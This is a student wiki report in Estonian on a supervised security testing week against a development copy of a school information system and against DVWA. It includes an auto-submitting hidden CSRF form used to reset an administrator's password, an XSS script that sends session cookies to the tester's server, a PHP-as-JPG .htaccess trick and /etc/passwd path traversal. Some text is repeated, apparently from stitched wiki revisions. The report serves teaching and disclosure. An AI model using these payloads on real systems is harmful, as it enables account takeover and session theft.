<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

====Väike upload tegevus, mis võiks olla teisiti====
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
:Alo Konno A21
:Urmo Lihten A21
:Taavi Podžuks A22
:Matis Alliksoo A22
:Sander Saarm A22

== Juhendajad ==
Täname oma juhendajaid:
:Mart Mangus
:Margus Ernits
:Valter Kungla

Security team

2012-03-30T21:05:07Z

Ulihten: /* Security Team tegevusplaan */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
:1.1 Tutvuda OWASP’iga.
:1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
:1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
:2.1 Esitada tiimi tegevusplaan.
:2.2 Tutvuda turvariskidega natuke põhjalikumalt.
:2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
:2.4 Täiendada esimese päeva ettekannet.
3. Päev
:3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
:3.2 Saadud tulemuste dokumenteerimine.
4. Päev
:4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
:5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===
==== Acunetix Web Vulnerability Scanner v. 8 automaatskännimise tööriistaga tutvumine ====
http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmise põhjalikkusega skänni.

Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.

Antud programm võimaldab skännida:
:Cross-Site Scripting (XSS)
:SQL Injection (blind test)
:File inclusion
:Code Execution
:LDAP Injection
:Cross Frame Scripting
:SQL Injection (error msg. test)
:CRLF Injection
:Directory Travelsal
:XPath Injection
:URL Redirection
:Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev - Dev-ÕIS'i turvatestimine==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

